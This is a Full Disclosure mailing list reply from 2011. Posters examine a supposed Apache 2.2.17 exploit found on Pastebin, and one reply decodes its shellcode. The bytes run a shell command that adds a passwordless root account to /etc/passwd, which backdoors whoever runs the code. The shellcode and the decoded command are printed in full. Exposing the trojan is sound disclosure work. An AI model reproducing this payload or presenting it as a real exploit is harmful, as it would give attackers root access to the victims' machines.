Full Disclosure mailing list archives

Re: Apache 2.2.17 exploit?

From: xD 0x41 <secn3t () gmail com>
Date: Wed, 5 Oct 2011 13:21:17 +1100

yer it is clarly leet stuff dude...
i ran it and got liek 2000000000000000k2.2.* apache user bot  in a night! :P
hgehe (jkin)
funny tho.
xd


On 5 October 2011 13:09, VeNoMouS <venom () gen-x co nz> wrote:

**
char evil[] =
                "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
\x89"
                "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51
\x89"
                "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80
\xe8"
                "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63
\x23"
                "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30
\x74"
                "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65
\x3a"
                "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73
\x68"
                "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77
\x64"
                "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44
\x44"
                "\x44\x44"
.....
execl("/bin/sh", "sh", "-c", evil, 0);

.....



/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

AHUH.....



On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:

I regularly trawl Pastebin.com to find code - often idiots leave some 0day
and similar there and it is nice to find.

Well, seeing as I have no test boxes at the moment, can someone check this
code in a VM? I am not sure if it is legit or not.

http://pastebin.com/ygByEV2e

Thanks :)

~Darren



   1. char evil[] =
    2.                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
   \x46\x47\x89"
    3.                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
   \x5e\x51\x89"
    4.                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
   \xcd\x80\xe8"
    5.                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
   \x2d\x63\x23"
    6.                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
   \x30\x30\x74"
    7.                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
   \x64\x65\x3a"
    8.                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
   \x61\x73\x68"
    9.                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
   \x73\x77\x64"
    10.                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43
   \x43\x44\x44"
    11.                 "\x44\x44";


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Apache 2.2.17 exploit?, (continued)
- - - Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
  - Re: Apache 2.2.17 exploit? nix (Oct 03)
    - Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
    - Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
  - Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? Nathaniel Hirsch (Oct 03)
- Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 03)
- Re: Apache 2.2.17 exploit? Guillaume Friloux (Oct 03)
- Re: Apache 2.2.17 exploit? GloW - XD (Oct 03)
- Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
  - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? adam (Oct 04)
    - Re: Apache 2.2.17 exploit? VeNoMouS (Oct 04)
    - Re: Apache 2.2.17 exploit? adam (Oct 04)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)